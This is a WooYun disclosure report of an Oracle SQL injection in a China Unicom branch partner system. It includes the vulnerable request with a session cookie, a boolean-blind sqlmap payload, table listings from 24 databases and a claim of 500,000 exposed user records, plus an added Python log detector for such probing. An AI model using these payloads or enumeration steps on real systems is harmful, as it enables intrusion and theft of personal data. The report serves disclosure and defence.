
Defect ID: wooyun-2016-0169912

Title: Oracle SQL injection in a China Unicom site (24 databases and 500,000 (50W) user records exposed)

Vendor: China Unicom

Author: Looke

Submitted: 2016-01-14 16:56

Fixed: 2016-02-27 11:49

Published: 2016-02-27 11:49

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 15

Status: handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure timeline:

2016-01-14: details sent to the vendor, awaiting the vendor's handling
2016-01-18: vendor confirmed; details visible to the vendor only
2016-01-28: details disclosed to core white hats and domain experts
2016-02-07: details disclosed to regular white hats
2016-02-17: details disclosed to intern white hats
2016-02-27: details disclosed to the public

Summary:

See the title.

Details:

Affected system: China Unicom Dongguan branch partner service system
System address: http://**.**.**.**/
Logged in with a weak password:
Found an injection point:

[image: 注入点.png (screenshot of the injection point)]


Vulnerable request:

GET /webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v_state=%27%D3%D0%D0%A7%27&v_flag= HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Referer: http://**.**.**.**/webout/kw/top.jsp?v_flag=
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=183FBB8776B8BB62763FE24A981885DF; csd=36000100; cod=36000050; LastVisitusername=100030


The v_state parameter is injectable (sqlmap output below):

---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v_state='%D3%D0%D0%A7') AND 3529=3529 AND (3172=3172&v_flag=
---
[20:23:10] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
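The sqlmap output above shows the classic boolean-based blind pattern: the same request is sent twice, once with a tautology (3529=3529) and once with a contradiction, and the response size tells the two apart. From the defender's side that pattern is visible in the web server's access log long before a database dump. The following script is an added example, not code from the report or from the affected system: it parses constructed Common Log Format lines whose request shape copies the report (kw.jsp with v_index / v_state / v_flag, GBK-encoded values), decodes each parameter with the site's charset, flags values that carry an AND/OR numeric comparison, and reports endpoints where one client sent both a true-probe and a false-probe and got differently sized replies. The IPs, timestamps and sizes in the sample are made up, and the regex covers only the numeric-comparison form shown in this report.

```python
"""Spot boolean-based blind SQL injection probing in web access logs.

Added example (not from the report). Decodes each query parameter with the
site's GBK encoding, looks for the tautology/contradiction comparisons that
blind probing relies on, and reports endpoints where a true-probe and a
false-probe from the same client produced responses of different sizes.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Common Log Format. Only the request shape
# (kw.jsp, v_index / v_state / v_flag) mirrors the report; IPs, timestamps
# and response sizes are invented.
SAMPLE_LOG = """\
10.0.0.1 - - [14/Jan/2016:20:23:10 +0800] "GET /webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v_state=%27%D3%D0%D0%A7%27&v_flag= HTTP/1.1" 200 5123
10.0.0.1 - - [14/Jan/2016:20:23:11 +0800] "GET /webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v_state='%D3%D0%D0%A7')%20AND%203529=3529%20AND%20(3172=3172&v_flag= HTTP/1.1" 200 5123
10.0.0.1 - - [14/Jan/2016:20:23:12 +0800] "GET /webout/kw/kw.jsp?v_index=%E1%DB%B7%E5&v_state='%D3%D0%D0%A7')%20AND%203529=3530%20AND%20(3172=3172&v_flag= HTTP/1.1" 200 412
10.0.0.2 - - [14/Jan/2016:20:25:00 +0800] "GET /webout/kw/top.jsp?v_flag= HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)'
)
# "AND 3529=3529" style comparisons: lhs == rhs is a tautology (true probe),
# lhs != rhs a contradiction (false probe).
PROBE_RE = re.compile(r"(?i)\b(?:and|or)\s+(\d+)\s*=\s*(\d+)")


def parse_line(line, encoding="gbk"):
    """Return (ip, path, params, size) for one CLF line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl splits each pair on the first '=' only, so a value such as
    # "') AND 3529=3529" survives intact; decode with the site's charset.
    params = parse_qsl(parts.query, keep_blank_values=True,
                       encoding=encoding, errors="replace")
    size = 0 if m.group("size") == "-" else int(m.group("size"))
    return m.group("ip"), parts.path, params, size


def classify_value(value):
    """Return 'true-probe', 'false-probe' or None for one decoded parameter value."""
    kinds = {"true-probe" if lhs == rhs else "false-probe"
             for lhs, rhs in PROBE_RE.findall(value)}
    if "false-probe" in kinds:
        return "false-probe"
    return "true-probe" if kinds else None


def scan_log(text):
    """Return one finding per flagged parameter occurrence, in log order."""
    findings = []
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, params, size = parsed
        for name, value in params:
            kind = classify_value(value)
            if kind:
                findings.append({"ip": ip, "path": path, "param": name,
                                 "kind": kind, "size": size})
    return findings


def blind_injection_candidates(findings):
    """Endpoints where one client sent both probe kinds and got different-sized replies."""
    sizes = defaultdict(lambda: {"true-probe": set(), "false-probe": set()})
    for f in findings:
        sizes[(f["ip"], f["path"], f["param"])][f["kind"]].add(f["size"])
    return [key for key, s in sizes.items()
            if s["true-probe"] and s["false-probe"]
            and s["true-probe"] != s["false-probe"]]


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print("blind-injection candidates:", blind_injection_candidates(found))
```

Run it as a script to see the two flagged v_state values and the single (client, path, parameter) triple that behaves like a blind-injection oracle. Decoding with the site's real charset matters: the benign value here is GBK-encoded Chinese, and a detector that assumes UTF-8 would either mangle it or miss a payload hidden among multi-byte sequences. The underlying fix for the endpoint is the usual one, binding v_state as a parameter rather than concatenating it into the SQL text.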

Proof of vulnerability:

24 databases:

[image: 数据库.png (screenshot of the database list)]


Database: WF
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| WORKFLOW_PROC_DETAIL | 305855 |
| WORKFLOW_PROC_LOG | 299811 |
| WORKFLOW_PROC | 240127 |
| SENDSMS_LOG | 233827 |
| WORKFLOW_HIS | 169942 |
| WORKFLOW | 67805 |
| WORKFLOW_PROC_DETAIL_HIS | 5606 |
| WORKFLOW_PROC_HIS | 5593 |
| WORKDAY | 3288 |
| WORKDAY2015 | 2922 |
| WORKFLOW_PROC_CUR | 1846 |
| WORKFLOW_PROC_LOG_HIS | 36 |
| WORKFLOW_ATTACH | 19 |
| WORKFLOW_PROC_MODEL | 15 |
| CODE_PROCESS_TYPE | 11 |
| CODE_STATUS | 11 |
| CODE_WORKFLOW_TYPE | 9 |
| CODE_CONTENT_TYPE | 8 |
| WORKFLOW_ADDSQL_ERRLOG | 8 |
| WORKFLOW_TYPE_AUTH | 4 |
| WORKFLOW_ATTACH_HIS | 1 |
+--------------------------------+---------+
Database: CLUB
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| CLUN_MEMBER_DATAVALUE | 4596169 |
| CLUB_MEMBER_DATASUM | 302553 |
| CLUB_MEMBER_GPRS | 245692 |
| TC_SELLER_MEMBER_NEW | 20174 |
| CLUB_BM | 17102 |
| CLUB_MEMBER | 9360 |
| CLUB_PLANS | 6724 |
| CLUB_MEMBERPONIT | 5477 |
| CLUB_INFO_USER | 5264 |
| V_12 | 1271 |
| V_1 | 1269 |
| CLUB_LECTURERPOINT | 1218 |
| CLUB_SUMMARY | 747 |
| CLUB_NEWS | 650 |
| CLUB_DOWNLOAD | 524 |
| CLUB_EXPERT_INFO | 134 |
| CLUB_KC | 100 |
| CLUB_PHOTO | 96 |
| CLUB_WZDG | 86 |
| CLUB_BASE_INFO | 67 |
| CLUB_KETANG | 66 |
| CLUB_QUESTION | 49 |
| CLUB_DAREN | 48 |
| CLUB_VIDEO | 35 |
| CLUB_ACTIVITIES | 31 |
| CLUB_TOWN | 30 |
| V_TEMP4 | 23 |
| V_PPPP | 21 |
| CLUB_PHONE | 16 |
| CLUB_JIEKOUREN | 15 |
| CLUB_CODE | 10 |
| CLUB_PHOTOTYPE | 9 |
| CLUB_NEWSTYPE | 6 |
| CLUB_OS | 4 |
| CLUB_QUESTIONTYPE | 4 |
| CLUB_LIUYAN | 2 |
| CLUB_BASESET | 1 |
| CLUB_INTEGRALRULES | 1 |
| CLUB_INTEGRALTYPES | 1 |
| CLUB_LOGINUSERS | 1 |
| CLUB_NEWSPIC | 1 |
| CLUB_WEBBASESET | 1 |
| CLUB_ZHUANJIA | 1 |
| CLUB_ZHUANJIANEWS | 1 |
+--------------------------------+---------+
Database: APEX_030200
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| WWV_FLOW_DICTIONARY$ | 70601 |
| WWV_FLOW_STEP_ITEMS | 9671 |
| WWV_FLOW_REGION_REPORT_COLUMN | 7903 |
| WWV_FLOW_PAGE_PLUGS | 7416 |
| WWV_FLOW_STEP_ITEM_HELP | 6335 |
| WWV_FLOW_LIST_OF_VALUES_DATA | 4184 |
| WWV_FLOW_MESSAGES$ | 3706 |
| WWV_FLOW_STEP_BUTTONS | 3513 |
| WWV_FLOW_STEP_BRANCHES | 3255 |
| WWV_FLOW_LIST_ITEMS | 3048 |
| WWV_FLOW_STEP_PROCESSING | 2238 |
| WWV_FLOW_STEP_VALIDATIONS | 1990 |
| WWV_FLOW_STEPS | 1754 |
| WWV_FLOW_MENU_OPTIONS | 1452 |
| WWV_FLOW_STEP_COMPUTATIONS | 984 |
| WWV_FLOW_LISTS_OF_VALUES$ | 959 |
| WWV_FLOW_WORKSHEET_COLUMNS | 721 |
| WWV_FLOW_LISTS | 601 |
| WWV_FLOW_REGION_UPD_RPT_COLS | 439 |
| WWV_FLOW_STANDARD_ICONS | 319 |
| WWV_FLOW_COUNTRIES | 240 |
| WWV_FLOW_TRANSLATABLE_COLS$ | 232 |
| WWV_FLOW_SW_MAIN_KEYWORDS | 199 |
| WWV_FLOW_PAGE_PLUG_TEMPLATES | 166 |
| WWV_FLOW_LANGUAGES | 132 |
| WWV_FLOW_LIST_TEMPLATES | 105 |
| WWV_FLOW_PAGE_GROUPS | 105 |
| WWV_FLOW_DUAL100 | 100 |
| WWV_FLOW_LANGUAGE_MAP | 90 |
| WWV_FLOW_ITEMS | 89 |
| WWV_FLOW_UPGRADE_PROGRESS | 89 |
| WWV_MIG_RESERVED_WORDS | 87 |
| WWV_FLOW_TEMPLATES | 64 |
| WWV_FLOW_HNT_COLUMN_INFO | 58 |
| WWV_FLOW_ROW_TEMPLATES | 54 |
| WWV_FLOW_RESTRICTED_SCHEMAS | 46 |
| WWV_FLOW_PROCESSING | 45 |
| WWV_MIG_FRM_OLB_XMLTAGTABLEMAP | 45 |
| WWV_FLOW_PAGE_GENERIC_ATTR | 44 |
| WWV_FLOW_RANDOM_IMAGES | 42 |
| WWV_FLOW_UPG_TAB_NAME_CHANGES | 42 |
| WWV_FLOW_SHORTCUTS | 39 |
| WWV_FLOW_ALT_CONFIG_PICK | 37 |
| WWV_FLOW_FIELD_TEMPLATES | 36 |
| WWV_MIG_FRM_XMLTAGTABLEMAP | 36 |
| WWV_FLOW_CHARSETS | 32 |
| WWV_FLOW_COMPANY_TYPES | 32 |
| WWV_FLOW_WORKSHEET_RPTS | 30 |
| WWV_FLOW_WORKSHEETS | 30 |
| WWV_FLOW_STANDARD_CSS | 27 |
| WWV_FLOW_PLATFORM_PREFS | 21 |
| WWV_FLOW_SECURITY_SCHEMES | 19 |
| WWV_FLOW_QUERY_COLUMN | 18 |
| WWV_FLOW_UPG_TAB_OBSOLETE | 17 |
| WWV_MIG_RPT_XMLTAGTABLEMAP | 15 |
| WWV_FLOW_COMPUTATIONS | 14 |
| WWV_FLOW_WORKSPACE_REQ_SIZE | 14 |
| WWV_FLOW_BUTTON_TEMPLATES | 12 |
| WWV_FLOW_ICON_BAR | 12 |
| WWV_FLOW_CALS | 11 |
| WWV_FLOW_CUSTOM_AUTH_SETUPS | 11 |
| WWV_FLOW_BANNER | 10 |
| WWV_FLOW_POPUP_LOV_TEMPLATE | 10 |
| WWV_FLOW_SW_CREATE_KEYWORDS | 10 |
| WWV_FLOW_THEMES | 10 |
| WWV_FLOWS | 10 |
| WWV_FLOW_CAL_TEMPLATES | 9 |
| WWV_FLOW_DEVELOPER_ROLES | 9 |
| WWV_FLOW_PATCHES | 9 |
| WWV_FLOW_HNT_TABLE_INFO | 8 |
| WWV_FLOW_MENU_TEMPLATES | 8 |
| WWV_FLOW_SW_SQLPLUS_CMD | 8 |
| WWV_FLOW_MENUS | 7 |
| WWV_MIG_MENU_XMLTAGTABLEMAP | 7 |
| WWV_FLOW_LOV_VALUES | 6 |
| WWV_FLOW_QUERY_CONDITION | 6 |
| WWV_FLOW_QUERY_DEFINITION | 6 |
| WWV_FLOW_QUERY_OBJECT | 6 |
| WWV_FLOW_FLASH_CHART_SERIES | 5 |
| WWV_FLOW_FLASH_CHARTS | 5 |
| WWV_FLOW_PICK_PAGE_VIEWS | 5 |
| WWV_FLOW_TOPLEVEL_TABS | 5 |
| WWV_MIG_EXPORTER | 5 |
| WWV_FLOW_PICK_END_USERS | 4 |
| WWV_FLOW_SW_SET_KEYWORDS | 4 |
| WWV_COLUMN_EXCEPTIONS | 3 |
| WWV_FLOW_COMPANIES | 3 |
| WWV_FLOW_TABS | 3 |
| WWV_FLOW_TREES | 3 |
| WWV_FLOW_INSTALL | 2 |
| WWV_FLOW_STANDARD_JS | 2 |
| WWV_FLOW_ACTIVITY_LOG_NUMBER$ | 1 |
| WWV_FLOW_APPLICATION_GROUPS | 1 |
| WWV_FLOW_CLICKTHRU_LOG_NUMBER$ | 1 |
| WWV_FLOW_COMPANY_SCHEMAS | 1 |
| WWV_FLOW_DB_AUTH | 1 |
| WWV_FLOW_FND_USER | 1 |
| WWV_FLOW_PASSWORD_HISTORY | 1 |
| WWV_FLOW_USER_ACCESS_LOG_NUM$ | 1 |
+--------------------------------+---------+
Database: PLANRUN
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| MONITOR_SQL_IMPORT | 3 |
+--------------------------------+---------+
Database: LIUXIONGHUI
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| V_TEMP22 | 194 |
+--------------------------------+---------+
Database: CYEC
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| T6_CODE | 20000 |
| T6_IPSTORE | 18395 |
| T6_SYS_DAYLOOK_IP | 643 |
| WEIXIN | 602 |
| T6_MEMBER | 342 |
| T6_ABLUM_PHOTO | 320 |
| MMS_SENDLOG | 207 |
| T6_INTEN_SCORE | 203 |
| T6_NEWS | 112 |
| T6_WXM | 46 |
| T6_KKMEMBER | 43 |
| T6_COM | 39 |
| T6_FAV | 34 |
| T6_VIDEO_CLUB | 34 |
| T6_SCHOOL | 29 |
| T6_INTEN_OBJECT | 25 |
| T6_LOGIN | 23 |
| T6_WXSET | 23 |
| T6_SHOP | 21 |
| T6_INTEN_LEADER | 19 |
| T6_INTEN_REPORT | 18 |
| T6_SECONDKILL | 16 |
| T6_IMG | 12 |
| T6_GUA | 11 |
| T6_ANSWER | 10 |
| T6_INTENDANCE | 10 |
| T6_SCORE | 10 |
| T6_ACTIVE_BOOK | 9 |
| T6_QR | 9 |
| T6_SHOP_ORDER | 8 |
| T6_CA | 7 |
| T6_NEWS_COMMENT | 7 |
| T6_REWARD | 7 |
| T6_ORDER | 6 |
| T6_SYS_DAYLOOK | 6 |
| T6_ACTIVE | 5 |
| T6_QUESTION | 4 |
| T6_SYS_MEMBER | 4 |
| T6_PORDER | 3 |
| T6_QTERM | 2 |
| T6_REWARDTYPE | 2 |
| T6_SKTERM | 2 |
| T6_APPLY | 1 |
| T6_KK_ABLUM | 1 |
| T6_PRO | 1 |
+--------------------------------+---------+
Database: LT
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| CJWEB | 12530 |
| CJWAP | 3904 |
| T1 | 828 |
| CJMINI | 388 |
| PRODUCT | 325 |
| NEWS | 160 |
| MOBILENO | 100 |
| CJMOBILE | 27 |
| PUR | 21 |
| DL | 19 |
| LINKS | 11 |
| DETAIL186 | 5 |
| AD | 4 |
| HOMEFLASH | 4 |
| CJ | 3 |
| USERS | 2 |
| BRAND | 1 |
| CJRULE | 1 |
+--------------------------------+---------+
Database: ORDDATA
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| ORDDCM_DICT_ATTRS | 2418 |
| ORDDCM_STD_ATTRS | 2415 |
| ORDDCM_UID_DEFS | 245 |
| ORDDCM_CT_LOCATORPATHS | 95 |
| ORDDCM_CT_DAREFS | 72 |
| ORDDCM_CT_PRED | 61 |
| ORDDCM_CT_PRED_OPRD | 53 |
| ORDDCM_INTERNAL_TAGS | 42 |
| ORDDCM_ANON_ATTRS | 37 |
| ORDDCM_VR_DT_MAP | 32 |
| ORDDCM_PREFS_LOOKUP | 13 |
| ORDDCM_RT_PREF_PARAMS | 13 |
| ORDDCM_CT_PRED_SET | 9 |
| ORDDCM_DOCS | 9 |
| ORDDCM_INSTALL_DOCS | 9 |
| ORDDCM_DOC_TYPES | 8 |
| ORDDCM_CT_ACTION | 7 |
| ORDDCM_DOC_REFS | 7 |
| ORDDCM_ANON_ACTION_TYPES | 4 |
| ORDDCM_ANON_RULE_TYPES | 3 |
| ORDDCM_ANON_RULES | 3 |
| ORDDCM_CT_PRED_PAR | 3 |
| ORDDCM_PRV_ATTRS | 3 |
| ORDDCM_CT_MACRO_PAR | 2 |
| ORDDCM_CT_MACRO_DEP | 1 |
| ORDDCM_DATA_MODEL | 1 |
| ORDDCM_MAPPING_DOCS | 1 |
+--------------------------------+---------+
Database: WEBOUT
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| P_ACCESS_LOG | 3356013 |
| TF_B_ACCESSLOG | 1874463 |
| P_LOGIN_LOG | 1785945 |
| TF_B_PAYLOG | 1587447 |
| ADMOBILE_ADSL | 402082 |
| P_USER_SINGLEPWD | 106366 |
| P_CODE_USER | 102024 |
| P_USER_ROLE | 83755 |
| CLUB_VIP_USER | 80805 |
| TC_SP_YIJIANTONG | 73825 |
| P_USER_ROLE_20140523 | 63915 |
| P_CODE_USER_20120410 | 58262 |
| P_USER_ROLE_20120410 | 48912 |
| WEB_SERVICE_PORT_LOG | 16933 |
| MEMBER_LOG | 12710 |
| JYSL_PROCLOG | 7100 |
| ADMOBILE_MOBILE | 6737 |
| P_CODE_USER_20111220 | 5658 |
| JYSL | 3391 |
| WAP_ACCESS_LOG | 3255 |
| P_ROLE_RIGHT_20120410 | 1608 |
| CLUB_VIP_QP_LOG | 1386 |
| P_ROLE_RIGHT | 1289 |
| P_ROLE_RIGHT_20140523 | 1263 |
| JYSL_RES_MOBILE | 999 |
| JZSL_RES_MOBILE | 978 |
| JYSL_FLOW_MAN | 935 |
| MEMBER_SCORE | 680 |
| P_CODE_RIGHT | 448 |
| P_CODE_RIGHT_20120410 | 445 |
| P_CODE_RIGHT_20140523 | 438 |
| TC_ZZTJ_MOBILETYPE_BAK | 356 |
| JYSL_AD_PHOTO | 234 |
| WAP_ZZTJ_LOG | 222 |
| LIANGHAO_REC | 167 |
| LIANGHAO_NO | 130 |
| P_UPLOAD_FILE | 106 |
| CLUB_VIP_QP | 104 |
| JYSL_AD | 94 |
| JZSL_OPER | 88 |
| CLUB_VIP_QP_SHUIGUO | 80 |
| P_CODE_ROLE | 80 |
| DL_RESOURCE | 76 |
| P_CODE_ROLE_20120410 | 76 |
| JYSL_YD_DINNER | 74 |
| JYSL_MOBILE | 31 |
| JZSL_DEPT | 26 |
| DG_WDGF | 24 |
| TEMP_USER | 22 |
| WEB_SERVICE_PORT_RET | 22 |
| JZSL_SALESHOP_CFG | 21 |
| JR_JIFEN_LOG | 17 |
| JYSL_FILE | 15 |
| CLUB_CINEMA | 13 |
| JYSL_FLOW | 13 |
| P_CODE_DEPT | 12 |
| JZSL_RES_MOBILE_SELECT | 11 |
| CLUB_CINEMA_NUMBER | 10 |
| P_CODE_AREA | 10 |
| ADMOBILE_ITEM | 8 |
| CLUB_FILM_YD | 7 |
| P_PUB_INFO | 7 |
| DL_RESOURCE_LOG | 6 |
| WEB_SERVICE_PORT | 5 |
| CLUB_CINEMA_TASK | 3 |
| JZSL_FLOW_MODEL | 3 |
| P_UPLOAD_FILE_TYPE | 3 |
| JYSL_MOBILE_FEE_IMPORT | 2 |
| JYSL_ORDER_FILE | 2 |
| P_CODE_APP | 2 |
| XSQD_PUBINFO | 2 |
| CLUB_FILM_DH | 1 |
| DG_TEST | 1 |
| JYSL_MOBILE_FEE | 1 |
| JZSL_AGENT | 1 |
| JZSL_AGENT_BIZ | 1 |
| JZSL_BIZ_TYPE | 1 |
| JZSL_FLOW_CURRENT | 1 |
| JZSL_FLOW_CURRENT_OPER | 1 |
| JZSL_MOBILE_POOL | 1 |
| JZSL_ORDER | 1 |
| JZSL_ORDER_FILE | 1 |
| WO_DETAINMENT | 1 |
| XSQD_PUBINFO_FILE | 1 |
+--------------------------------+---------+


500,000 (50W) user records

[image: 用户信息1.png (screenshot of user records)]


[image: 用户表2.png (screenshot of a user table)]

Remediation:

Copyright notice: please credit the source when reposting, Looke@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2016-01-18 18:41

Vendor reply:

CNVD has confirmed the reported issue; it has been forwarded via CNCERT to the Guangdong branch centre, which will coordinate handling with the site's operating unit.

Latest status:

None yet